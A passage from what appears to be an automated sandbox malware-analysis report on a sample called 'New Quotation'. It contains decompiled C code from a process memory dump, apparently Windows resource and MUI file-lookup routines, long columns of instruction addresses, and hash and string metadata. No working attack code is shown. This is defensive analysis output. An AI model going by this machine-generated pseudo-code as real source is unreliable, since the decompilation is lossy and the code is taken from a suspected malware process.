																					_v2662 = 0x2be;
																					E1D7DFE40(_t486 >> 1,  &_v2664, "\\");
																					E1D7F10D0(_t487,  &_v2664,  &_v2696);
																					E1D7DFE40(_t487,  &_v2664, "\\");
																					E1D7DFE40(_t487,  &_v2664, _v2720);
																					_t545 = E1D7D91E5(_v2668,  &_v2664, _v2688, _a24, _v2692, _v2684,  &_v2708,  &_v2676,  &_v2672);
																					goto L130;
																				}
																			} else {
																				__eflags = _t545 - 0xc0000034;
																				if(_t545 == 0xc0000034) {
																					goto L81;
																				}
																			}
																		}
																	} else {
																		_t498 = _v2692;
																		_t417 = E1D7D8DBB(_v2692, _v2660,  &_v2744,  &_v2384);
																		_v2652 = _t417;
																		__eflags = _t417 - 0xc0000023;
																		if(_t417 == 0xc0000023) {
																			_t419 = E1D7E5D90(_t498,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v2744);
																			_v2716 = _t419;
																			__eflags = _t419;
																			if(_t419 == 0) {
																				goto L32;
																			} else {
																				_v2652 = E1D7D8DBB(_v2692, _v2660,  &_v2744, _t419);
																				goto L31;
																			}
																			goto L42;
																		} else {
																			L31:
																			_t419 = _v2716;
																		}
																		L32:
																		__eflags = _v2652;
																		if(_v2652 >= 0) {
																			_t421 = E1D7F1D10( &_v2800, _t419);
																			__eflags = _t421;
																			if(_t421 < 0) {
																				goto L33;
																			} else {
																				_t545 = E1D7D91E5(_v2668,  &_v2800, _v2688, _a24, _v2692, 2,  &_v2708,  &_v2676,  &_v2672);
																				_v2652 = _t545;
																				__eflags = _t545;
																				if(_t545 < 0) {
																					__eflags = _t545 - 0xc0000034;
																					if(__eflags != 0) {
																						E1D850961(_t545,  &_v2800, __eflags, _v2688, _a24,  &_v2696);
																					}
																					goto L33;
																				} else {
																					E1D7F1D10( &_v2664, _v2716);
																				}
																			}
																		} else {
																			goto L33;
																		}
																	}
																} else {
																	_v2692 =  &_v1680;
																	_v2694 = 0xaa;
																	_t438 = E1D7F5A40(_t517, _v2728 & 0x0000ffff,  &_v2696, 2, 0);
																	__eflags = _t438;
																	if(_t438 < 0) {
																		_t545 = 0xc000000d;
																		L130:
																		_v2652 = _t545;
																	} else {
																		E1D7F10D0(_t478,  &_v2664,  &_v2696);
																		E1D7DFE40(_t478,  &_v2664, "\\");
																		goto L29;
																	}
																}
															}
														}
													}
												}
											}
											L39:
											__eflags = _v2672;
											if(_v2672 == 0) {
												_v2672 = _v2672 | 0xffffffff;
											}
											__eflags = _t545;
											if(_t545 < 0) {
												__eflags = _t545 - 0xc000012d;
												if(_t545 == 0xc000012d) {
													L131:
													_t308 = 0;
												} else {
													__eflags = _t545 - 0xc00000a5;
													if(_t545 == 0xc00000a5) {
														goto L131;
													} else {
														__eflags = _t545 - 0xc0000017;
														if(_t545 != 0xc0000017) {
															goto L41;
														} else {
															goto L131;
														}
													}
												}
											} else {
												L41:
												_t308 = _v2653;
											}
											goto L42;
										}
									}
								} else {
									_v4 = 0;
									 *_t533 = _t301;
									_t505 = _v2740;
									if(_t505 != 0) {
										 *_t505 = _v2676;
									}
									_v2652 = 0;
									_v4 = 0xfffffffe;
									_t300 = 0;
									L8:
									 *[fs:0x0] = _v16;
									return _t300;
								}
							}
						}
					}
				}
				L141:
			}





















































































































                                                                                                                                                                                          0x1d7dbde0
                                                                                                                                                                                          0x1d7dbde5
                                                                                                                                                                                          0x1d7dbdea
                                                                                                                                                                                          0x1d7dbdf2
                                                                                                                                                                                          0x1d7dbdfc
                                                                                                                                                                                          0x1d7dbe05
                                                                                                                                                                                          0x1d7dbe0e
                                                                                                                                                                                          0x1d7dbe16
                                                                                                                                                                                          0x1d7dbe1c
                                                                                                                                                                                          0x1d7dbe22
                                                                                                                                                                                          0x1d7dbe24
                                                                                                                                                                                          0x1d7dbe2a
                                                                                                                                                                                          0x1d7dbe30
                                                                                                                                                                                          0x1d7dbe36
                                                                                                                                                                                          0x1d7dbe3c
                                                                                                                                                                                          0x1d7dbe42
                                                                                                                                                                                          0x1d7dbe48
                                                                                                                                                                                          0x1d7dbe55
                                                                                                                                                                                          0x1d7dbe5d
                                                                                                                                                                                          0x1d7dbe66
                                                                                                                                                                                          0x1d7dbe68
                                                                                                                                                                                          0x1d7dbe6e
                                                                                                                                                                                          0x1d7dbe74
                                                                                                                                                                                          0x1d7dbe7a
                                                                                                                                                                                          0x1d7dbe80
                                                                                                                                                                                          0x1d7dbe8c
                                                                                                                                                                                          0x1d7dbe92
                                                                                                                                                                                          0x1d7dbe9c
                                                                                                                                                                                          0x1d7dbea2
                                                                                                                                                                                          0x1d7dbea8
                                                                                                                                                                                          0x1d7dbeb0
                                                                                                                                                                                          0x1d833cea
                                                                                                                                                                                          0x1d833cea
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7dbeb6
                                                                                                                                                                                          0x1d7dbeb6
                                                                                                                                                                                          0x1d7dbebf
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7dbec5
                                                                                                                                                                                          0x1d7dbec5
                                                                                                                                                                                          0x1d7dbecd
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7dbed3
                                                                                                                                                                                          0x1d7dbede
                                                                                                                                                                                          0x1d7dbee0
                                                                                                                                                                                          0x1d7dbee8
                                                                                                                                                                                          0x1d7dc33e
                                                                                                                                                                                          0x1d7dc33e
                                                                                                                                                                                          0x1d7dc344
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7dc34a
                                                                                                                                                                                          0x1d7dc350
                                                                                                                                                                                          0x1d7dc352
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7dc352
                                                                                                                                                                                          0x1d7dbeee
                                                                                                                                                                                          0x1d7dbef0
                                                                                                                                                                                          0x1d7dbf2d
                                                                                                                                                                                          0x1d7dbf2d
                                                                                                                                                                                          0x1d7dbf33
                                                                                                                                                                                          0x1d7dbf33
                                                                                                                                                                                          0x1d7dbf39
                                                                                                                                                                                          0x1d7dbf3f
                                                                                                                                                                                          0x1d7dbf41
                                                                                                                                                                                          0x1d833974
                                                                                                                                                                                          0x1d7dbf47
                                                                                                                                                                                          0x1d7dbf6a
                                                                                                                                                                                          0x1d7dbf70
                                                                                                                                                                                          0x1d7dbf75
                                                                                                                                                                                          0x1d7dbf75
                                                                                                                                                                                          0x1d7dbf7b
                                                                                                                                                                                          0x1d7dbf7d
                                                                                                                                                                                          0x1d8339a5
                                                                                                                                                                                          0x1d8339b0
                                                                                                                                                                                          0x1d8339b2
                                                                                                                                                                                          0x1d8339b8
                                                                                                                                                                                          0x1d8339ba
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8339c0
                                                                                                                                                                                          0x1d8339c0
                                                                                                                                                                                          0x1d8339c6
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8339c6
                                                                                                                                                                                          0x1d7dbf83
                                                                                                                                                                                          0x1d7dbf83
                                                                                                                                                                                          0x1d7dbf89
                                                                                                                                                                                          0x1d7dbf8c
                                                                                                                                                                                          0x1d7dbf91
                                                                                                                                                                                          0x1d7dc62e
                                                                                                                                                                                          0x1d7dc635
                                                                                                                                                                                          0x1d7dc63b
                                                                                                                                                                                          0x1d7dc63c
                                                                                                                                                                                          0x1d7dc63d
                                                                                                                                                                                          0x1d7dc63e
                                                                                                                                                                                          0x1d7dc640
                                                                                                                                                                                          0x1d7dc645
                                                                                                                                                                                          0x1d7dc647
                                                                                                                                                                                          0x1d7dc649
                                                                                                                                                                                          0x1d7dc64f
                                                                                                                                                                                          0x1d7dc651
                                                                                                                                                                                          0x1d7dc66c
                                                                                                                                                                                          0x1d7dc671
                                                                                                                                                                                          0x1d7dc673
                                                                                                                                                                                          0x1d7dc675
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7dc677
                                                                                                                                                                                          0x1d7dc67f
                                                                                                                                                                                          0x1d7dc680
                                                                                                                                                                                          0x1d7dc681
                                                                                                                                                                                          0x1d7dc682
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7dc682
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7dc653
                                                                                                                                                                                          0x1d7dc653
                                                                                                                                                                                          0x1d7dc658
                                                                                                                                                                                          0x1d7dc658
                                                                                                                                                                                          0x1d7dc65d
                                                                                                                                                                                          0x1d7dc65d
                                                                                                                                                                                          0x1d7dc660
                                                                                                                                                                                          0x1d7dc662
                                                                                                                                                                                          0x1d7dc665
                                                                                                                                                                                          0x1d7dc665
                                                                                                                                                                                          0x1d7dc660
                                                                                                                                                                                          0x1d7dc66b
                                                                                                                                                                                          0x1d7dbf97
                                                                                                                                                                                          0x1d7dbf99
                                                                                                                                                                                          0x1d7dbfa4
                                                                                                                                                                                          0x1d7dbfaa
                                                                                                                                                                                          0x1d7dbfab
                                                                                                                                                                                          0x1d7dbfad
                                                                                                                                                                                          0x1d8339da
                                                                                                                                                                                          0x1d8339e0
                                                                                                                                                                                          0x1d8339e5
                                                                                                                                                                                          0x1d8339e7
                                                                                                                                                                                          0x1d8339ed
                                                                                                                                                                                          0x1d8339f3
                                                                                                                                                                                          0x1d8339f9
                                                                                                                                                                                          0x1d8339fb
                                                                                                                                                                                          0x1d8339fe
                                                                                                                                                                                          0x1d8339fe
                                                                                                                                                                                          0x1d833a01
                                                                                                                                                                                          0x1d833a04
                                                                                                                                                                                          0x1d833a04
                                                                                                                                                                                          0x1d833a0b
                                                                                                                                                                                          0x1d833a10
                                                                                                                                                                                          0x1d833a10
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7dc262
                                                                                                                                                                                          0x1d7dc262
                                                                                                                                                                                          0x1d7dc264
                                                                                                                                                                                          0x1d7dc266
                                                                                                                                                                                          0x1d7dc26c
                                                                                                                                                                                          0x1d7dc26f
                                                                                                                                                                                          0x1d7dc274
                                                                                                                                                                                          0x1d7dc274
                                                                                                                                                                                          0x1d7dc275
                                                                                                                                                                                          0x1d7dc276
                                                                                                                                                                                          0x1d7dc27c
                                                                                                                                                                                          0x1d7dc283
                                                                                                                                                                                          0x1d7dc290
                                                                                                                                                                                          0x1d7dc290
                                                                                                                                                                                          0x1d7dc295
                                                                                                                                                                                          0x1d7dc29c
                                                                                                                                                                                          0x1d7dc4a0
                                                                                                                                                                                          0x1d7dc2a2
                                                                                                                                                                                          0x1d7dc2a2
                                                                                                                                                                                          0x1d7dc2a7
                                                                                                                                                                                          0x1d7dc2a9
                                                                                                                                                                                          0x1d833c2b
                                                                                                                                                                                          0x1d7dc2af
                                                                                                                                                                                          0x1d7dc2af
                                                                                                                                                                                          0x1d7dc2af
                                                                                                                                                                                          0x1d7dc2b4
                                                                                                                                                                                          0x1d7dc2b7
                                                                                                                                                                                          0x1d833c35
                                                                                                                                                                                          0x1d833c3a
                                                                                                                                                                                          0x1d833c3c
                                                                                                                                                                                          0x1d833c4e
                                                                                                                                                                                          0x1d833c3e
                                                                                                                                                                                          0x1d833c47
                                                                                                                                                                                          0x1d833c47
                                                                                                                                                                                          0x1d833c5c
                                                                                                                                                                                          0x1d833c5c
                                                                                                                                                                                          0x1d7dc2bd
                                                                                                                                                                                          0x1d7dc2d0
                                                                                                                                                                                          0x1d7dc2d2
                                                                                                                                                                                          0x1d7dc2d8
                                                                                                                                                                                          0x1d7dc2da
                                                                                                                                                                                          0x1d7dc2e2
                                                                                                                                                                                          0x1d7dc2e2
                                                                                                                                                                                          0x1d7dc2e4
                                                                                                                                                                                          0x1d7dc2e6
                                                                                                                                                                                          0x1d7dc2ec
                                                                                                                                                                                          0x1d7dc2ec
                                                                                                                                                                                          0x1d7dc2f3
                                                                                                                                                                                          0x1d7dc2fa
                                                                                                                                                                                          0x1d833ca4
                                                                                                                                                                                          0x1d833ca9
                                                                                                                                                                                          0x1d7dc300
                                                                                                                                                                                          0x1d7dc306
                                                                                                                                                                                          0x1d7dc308
                                                                                                                                                                                          0x1d833cbf
                                                                                                                                                                                          0x1d833cc4
                                                                                                                                                                                          0x1d833cc4
                                                                                                                                                                                          0x1d7dc30e
                                                                                                                                                                                          0x1d7dc314
                                                                                                                                                                                          0x1d7dc316
                                                                                                                                                                                          0x1d7dc54d
                                                                                                                                                                                          0x1d7dc552
                                                                                                                                                                                          0x1d7dc552
                                                                                                                                                                                          0x1d7dc31c
                                                                                                                                                                                          0x1d7dc322
                                                                                                                                                                                          0x1d7dc324
                                                                                                                                                                                          0x1d7dc32c
                                                                                                                                                                                          0x1d7dc32e
                                                                                                                                                                                          0x1d833cda
                                                                                                                                                                                          0x1d833cdf
                                                                                                                                                                                          0x1d833cdf
                                                                                                                                                                                          0x1d7dc32e
                                                                                                                                                                                          0x1d7dc334
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7dc334
                                                                                                                                                                                          0x1d7dbfb3
                                                                                                                                                                                          0x1d7dbfbb
                                                                                                                                                                                          0x1d7dbfc8
                                                                                                                                                                                          0x1d7dbfd3
                                                                                                                                                                                          0x1d7dbfd9
                                                                                                                                                                                          0x1d7dbfe3
                                                                                                                                                                                          0x1d7dbfeb
                                                                                                                                                                                          0x1d7dbff1
                                                                                                                                                                                          0x1d7dbffc
                                                                                                                                                                                          0x1d7dbffd
                                                                                                                                                                                          0x1d7dbfff
                                                                                                                                                                                          0x1d7dc50a
                                                                                                                                                                                          0x1d7dc50f
                                                                                                                                                                                          0x1d7dc515
                                                                                                                                                                                          0x1d7dc517
                                                                                                                                                                                          0x1d833a1b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7dc51d
                                                                                                                                                                                          0x1d7dc51d
                                                                                                                                                                                          0x1d7dc530
                                                                                                                                                                                          0x1d7dc537
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7dc537
                                                                                                                                                                                          0x1d7dc005
                                                                                                                                                                                          0x1d7dc00b
                                                                                                                                                                                          0x1d7dc011
                                                                                                                                                                                          0x1d7dc018
                                                                                                                                                                                          0x1d7dc01a
                                                                                                                                                                                          0x1d7dc02e
                                                                                                                                                                                          0x1d7dc030
                                                                                                                                                                                          0x1d7dc036
                                                                                                                                                                                          0x1d7dc038
                                                                                                                                                                                          0x1d7dc03e
                                                                                                                                                                                          0x1d7dc045
                                                                                                                                                                                          0x1d7dc04a
                                                                                                                                                                                          0x1d7dc04c
                                                                                                                                                                                          0x1d7dc04c
                                                                                                                                                                                          0x1d7dc05e
                                                                                                                                                                                          0x1d7dc060
                                                                                                                                                                                          0x1d7dc066
                                                                                                                                                                                          0x1d7dc068
                                                                                                                                                                                          0x1d7dc06e
                                                                                                                                                                                          0x1d7dc074
                                                                                                                                                                                          0x1d7dc076
                                                                                                                                                                                          0x1d7dc5ca
                                                                                                                                                                                          0x1d7dc5ca
                                                                                                                                                                                          0x1d7dc07c
                                                                                                                                                                                          0x1d7dc083
                                                                                                                                                                                          0x1d7dc09e
                                                                                                                                                                                          0x1d7dc0af
                                                                                                                                                                                          0x1d7dc0b1
                                                                                                                                                                                          0x1d7dc0b7
                                                                                                                                                                                          0x1d7dc0be
                                                                                                                                                                                          0x1d7dc0c3
                                                                                                                                                                                          0x1d7dc0c5
                                                                                                                                                                                          0x1d7dc5d4
                                                                                                                                                                                          0x1d7dc5db
                                                                                                                                                                                          0x1d7dc5e4
                                                                                                                                                                                          0x1d7dc5ed
                                                                                                                                                                                          0x1d7dc5f8
                                                                                                                                                                                          0x1d7dc5f8
                                                                                                                                                                                          0x1d7dc0cb
                                                                                                                                                                                          0x1d7dc0d2
                                                                                                                                                                                          0x1d7dc604
                                                                                                                                                                                          0x1d7dc60a
                                                                                                                                                                                          0x1d7dc60c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7dc0d8
                                                                                                                                                                                          0x1d7dc0de
                                                                                                                                                                                          0x1d7dc0e4
                                                                                                                                                                                          0x1d7dc0f1
                                                                                                                                                                                          0x1d7dc0f1
                                                                                                                                                                                          0x1d7dc0f7
                                                                                                                                                                                          0x1d7dc55d
                                                                                                                                                                                          0x1d7dc563
                                                                                                                                                                                          0x1d7dc566
                                                                                                                                                                                          0x1d7dc566
                                                                                                                                                                                          0x1d7dc569
                                                                                                                                                                                          0x1d7dc56c
                                                                                                                                                                                          0x1d7dc56c
                                                                                                                                                                                          0x1d7dc575
                                                                                                                                                                                          0x1d7dc587
                                                                                                                                                                                          0x1d7dc58d
                                                                                                                                                                                          0x1d7dc58f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7dc57e
                                                                                                                                                                                          0x1d7dc582
                                                                                                                                                                                          0x1d7dc584
                                                                                                                                                                                          0x1d7dc584
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7dc584
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7dc582
                                                                                                                                                                                          0x1d7dc597
                                                                                                                                                                                          0x1d7dc599
                                                                                                                                                                                          0x1d833a4c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7dc59f
                                                                                                                                                                                          0x1d7dc59f
                                                                                                                                                                                          0x1d7dc5a1
                                                                                                                                                                                          0x1d7dc5b3
                                                                                                                                                                                          0x1d7dc5b8
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7dc5b8
                                                                                                                                                                                          0x1d7dc0fd
                                                                                                                                                                                          0x1d7dc0fd
                                                                                                                                                                                          0x1d7dc103
                                                                                                                                                                                          0x1d7dc10b
                                                                                                                                                                                          0x1d7dc110
                                                                                                                                                                                          0x1d7dc112
                                                                                                                                                                                          0x1d7dc171
                                                                                                                                                                                          0x1d7dc17e
                                                                                                                                                                                          0x1d7dc183
                                                                                                                                                                                          0x1d7dc185
                                                                                                                                                                                          0x1d7dc1ca
                                                                                                                                                                                          0x1d7dc1ca
                                                                                                                                                                                          0x1d7dc1d0
                                                                                                                                                                                          0x1d7dc206
                                                                                                                                                                                          0x1d7dc208
                                                                                                                                                                                          0x1d7dc20e
                                                                                                                                                                                          0x1d7dc214
                                                                                                                                                                                          0x1d7dc35c
                                                                                                                                                                                          0x1d7dc362
                                                                                                                                                                                          0x1d7dc368
                                                                                                                                                                                          0x1d7dc374
                                                                                                                                                                                          0x1d7dc387
                                                                                                                                                                                          0x1d7dc38c
                                                                                                                                                                                          0x1d7dc38e
                                                                                                                                                                                          0x1d7dc39b
                                                                                                                                                                                          0x1d7dc3a0
                                                                                                                                                                                          0x1d7dc3a6
                                                                                                                                                                                          0x1d7dc3ac
                                                                                                                                                                                          0x1d7dc3ae
                                                                                                                                                                                          0x1d7dc3b0
                                                                                                                                                                                          0x1d7dc3b0
                                                                                                                                                                                          0x1d7dc3b0
                                                                                                                                                                                          0x1d7dc3b2
                                                                                                                                                                                          0x1d7dc3b5
                                                                                                                                                                                          0x1d7dc4c6
                                                                                                                                                                                          0x1d7dc3bb
                                                                                                                                                                                          0x1d7dc3bb
                                                                                                                                                                                          0x1d7dc3bb
                                                                                                                                                                                          0x1d7dc3c1
                                                                                                                                                                                          0x1d7dc3c7
                                                                                                                                                                                          0x1d7dc3cd
                                                                                                                                                                                          0x1d7dc3cf
                                                                                                                                                                                          0x1d7dc3d1
                                                                                                                                                                                          0x1d7dc3d1
                                                                                                                                                                                          0x1d7dc3d1
                                                                                                                                                                                          0x1d7dc3d3
                                                                                                                                                                                          0x1d7dc3d6
                                                                                                                                                                                          0x1d7dc4d1
                                                                                                                                                                                          0x1d7dc4db
                                                                                                                                                                                          0x1d7dc3dc
                                                                                                                                                                                          0x1d7dc3dc
                                                                                                                                                                                          0x1d7dc3dc
                                                                                                                                                                                          0x1d7dc421
                                                                                                                                                                                          0x1d7dc427
                                                                                                                                                                                          0x1d7dc42d
                                                                                                                                                                                          0x1d7dc433
                                                                                                                                                                                          0x1d7dc435
                                                                                                                                                                                          0x1d7dc437
                                                                                                                                                                                          0x1d7dc437
                                                                                                                                                                                          0x1d7dc437
                                                                                                                                                                                          0x1d7dc439
                                                                                                                                                                                          0x1d7dc43c
                                                                                                                                                                                          0x1d7dc4e6
                                                                                                                                                                                          0x1d7dc4ec
                                                                                                                                                                                          0x1d7dc442
                                                                                                                                                                                          0x1d7dc442
                                                                                                                                                                                          0x1d7dc442
                                                                                                                                                                                          0x1d7dc448
                                                                                                                                                                                          0x1d7dc448
                                                                                                                                                                                          0x1d7dc454
                                                                                                                                                                                          0x1d7dc45a
                                                                                                                                                                                          0x1d833b4c
                                                                                                                                                                                          0x1d833b4c
                                                                                                                                                                                          0x1d7dc21a
                                                                                                                                                                                          0x1d7dc21a
                                                                                                                                                                                          0x1d7dc220
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7dc220
                                                                                                                                                                                          0x1d7dc226
                                                                                                                                                                                          0x1d7dc22d
                                                                                                                                                                                          0x1d7dc22f
                                                                                                                                                                                          0x1d7dc235
                                                                                                                                                                                          0x1d7dc4a7
                                                                                                                                                                                          0x1d7dc4b4
                                                                                                                                                                                          0x1d7dc4b9
                                                                                                                                                                                          0x1d7dc4bb
                                                                                                                                                                                          0x1d833b56
                                                                                                                                                                                          0x1d833b5c
                                                                                                                                                                                          0x1d833b62
                                                                                                                                                                                          0x1d833b64
                                                                                                                                                                                          0x1d833b67
                                                                                                                                                                                          0x1d833b67
                                                                                                                                                                                          0x1d833b6a
                                                                                                                                                                                          0x1d833b6d
                                                                                                                                                                                          0x1d833b6d
                                                                                                                                                                                          0x1d833b72
                                                                                                                                                                                          0x1d833b72
                                                                                                                                                                                          0x1d833b74
                                                                                                                                                                                          0x1d833b79
                                                                                                                                                                                          0x1d833b85
                                                                                                                                                                                          0x1d833b98
                                                                                                                                                                                          0x1d833bab
                                                                                                                                                                                          0x1d833bbc
                                                                                                                                                                                          0x1d833bce
                                                                                                                                                                                          0x1d833c0e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d833c0e
                                                                                                                                                                                          0x1d7dc23b
                                                                                                                                                                                          0x1d7dc23b
                                                                                                                                                                                          0x1d7dc241
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7dc241
                                                                                                                                                                                          0x1d7dc235
                                                                                                                                                                                          0x1d7dc187
                                                                                                                                                                                          0x1d7dc19b
                                                                                                                                                                                          0x1d7dc1a1
                                                                                                                                                                                          0x1d7dc1a6
                                                                                                                                                                                          0x1d7dc1ac
                                                                                                                                                                                          0x1d7dc1b1
                                                                                                                                                                                          0x1d833a71
                                                                                                                                                                                          0x1d833a76
                                                                                                                                                                                          0x1d833a7c
                                                                                                                                                                                          0x1d833a7e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d833a84
                                                                                                                                                                                          0x1d833a9d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d833a9d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7dc1b7
                                                                                                                                                                                          0x1d7dc1b7
                                                                                                                                                                                          0x1d7dc1b7
                                                                                                                                                                                          0x1d7dc1b7
                                                                                                                                                                                          0x1d7dc1bd
                                                                                                                                                                                          0x1d7dc1bd
                                                                                                                                                                                          0x1d7dc1c4
                                                                                                                                                                                          0x1d833ab0
                                                                                                                                                                                          0x1d833ab5
                                                                                                                                                                                          0x1d833ab7
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d833abd
                                                                                                                                                                                          0x1d833af4
                                                                                                                                                                                          0x1d833af6
                                                                                                                                                                                          0x1d833afc
                                                                                                                                                                                          0x1d833afe
                                                                                                                                                                                          0x1d833b18
                                                                                                                                                                                          0x1d833b1e
                                                                                                                                                                                          0x1d833b3c
                                                                                                                                                                                          0x1d833b3c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d833b00
                                                                                                                                                                                          0x1d833b0e
                                                                                                                                                                                          0x1d833b0e
                                                                                                                                                                                          0x1d833afe
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7dc1c4
                                                                                                                                                                                          0x1d7dc114
                                                                                                                                                                                          0x1d7dc11a
                                                                                                                                                                                          0x1d7dc125
                                                                                                                                                                                          0x1d7dc140
                                                                                                                                                                                          0x1d7dc145
                                                                                                                                                                                          0x1d7dc147
                                                                                                                                                                                          0x1d833a56
                                                                                                                                                                                          0x1d833c10
                                                                                                                                                                                          0x1d833c10
                                                                                                                                                                                          0x1d7dc14d
                                                                                                                                                                                          0x1d7dc15b
                                                                                                                                                                                          0x1d7dc16c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7dc16c
                                                                                                                                                                                          0x1d7dc147
                                                                                                                                                                                          0x1d7dc112
                                                                                                                                                                                          0x1d7dc0f7
                                                                                                                                                                                          0x1d7dc0d2
                                                                                                                                                                                          0x1d7dc068
                                                                                                                                                                                          0x1d7dc038
                                                                                                                                                                                          0x1d7dc247
                                                                                                                                                                                          0x1d7dc247
                                                                                                                                                                                          0x1d7dc24e
                                                                                                                                                                                          0x1d7dc465
                                                                                                                                                                                          0x1d7dc465
                                                                                                                                                                                          0x1d7dc254
                                                                                                                                                                                          0x1d7dc256
                                                                                                                                                                                          0x1d7dc471
                                                                                                                                                                                          0x1d7dc477
                                                                                                                                                                                          0x1d833c1b
                                                                                                                                                                                          0x1d833c1b
                                                                                                                                                                                          0x1d7dc47d
                                                                                                                                                                                          0x1d7dc47d
                                                                                                                                                                                          0x1d7dc483
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7dc489
                                                                                                                                                                                          0x1d7dc489
                                                                                                                                                                                          0x1d7dc48f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7dc495
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7dc495
                                                                                                                                                                                          0x1d7dc48f
                                                                                                                                                                                          0x1d7dc483
                                                                                                                                                                                          0x1d7dc25c
                                                                                                                                                                                          0x1d7dc25c
                                                                                                                                                                                          0x1d7dc25c
                                                                                                                                                                                          0x1d7dc25c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7dc256
                                                                                                                                                                                          0x1d7dbf91
                                                                                                                                                                                          0x1d7dbef2
                                                                                                                                                                                          0x1d7dbef2
                                                                                                                                                                                          0x1d7dbef5
                                                                                                                                                                                          0x1d7dbef7
                                                                                                                                                                                          0x1d7dbeff
                                                                                                                                                                                          0x1d7dbf07
                                                                                                                                                                                          0x1d7dbf07
                                                                                                                                                                                          0x1d7dbf09
                                                                                                                                                                                          0x1d7dbf0f
                                                                                                                                                                                          0x1d7dbf16
                                                                                                                                                                                          0x1d7dbf18
                                                                                                                                                                                          0x1d7dbf1b
                                                                                                                                                                                          0x1d7dbf27
                                                                                                                                                                                          0x1d7dbf27
                                                                                                                                                                                          0x1d7dbef0
                                                                                                                                                                                          0x1d7dbee8
                                                                                                                                                                                          0x1d7dbecd
                                                                                                                                                                                          0x1d7dbebf
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: $$.mui$.mun$SystemResources\
                                                                                                                                                                                          • API String ID: 0-3047833772
                                                                                                                                                                                          • Opcode ID: 0c4195201ab0649913c12cfb4536073ffe664244af0075925fe819ababc052d3
                                                                                                                                                                                          • Instruction ID: 1328570533762ffdf74bd30604acae2a9427374c35fbb2957be294c0cd35999c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0c4195201ab0649913c12cfb4536073ffe664244af0075925fe819ababc052d3
                                                                                                                                                                                          • Instruction Fuzzy Hash: EE624C72A047699FCB61CF54CC44BE9B7B8BB0A620F0541EAE50DA7650D731AE84CF93
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7E3C60 Relevance: 5.4, Strings: 3, Instructions: 1603COMMONCrypto
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 91%
                                                                                                                                                                                          			E1D7E3C60(signed char __ecx, signed int _a4, intOrPtr _a8) {
				signed short _v8;
				signed int _v12;
				char _v20;
				signed char _v32;
				signed int _v36;
				char _v37;
				char _v38;
				signed int _v44;
				signed short _v48;
				signed char _v52;
				signed char _v56;
				char _v60;
				short _v64;
				signed int _v72;
				signed short _v76;
				signed int _v80;
				signed int _v84;
				char _v85;
				char _v86;
				signed int _v92;
				signed int _v96;
				signed short _v100;
				signed short* _v104;
				signed char _v105;
				signed short _v108;
				signed short _v110;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed short _v128;
				signed short _v132;
				signed short _v136;
				signed int _v140;
				signed int _v144;
				signed short _v148;
				unsigned int _v152;
				signed short _v156;
				signed int _v160;
				signed int _v164;
				signed short _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v196;
				unsigned int* _v200;
				signed int _v204;
				signed int _v208;
				signed short _v212;
				signed char _v216;
				signed int _v224;
				signed int _v228;
				intOrPtr _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
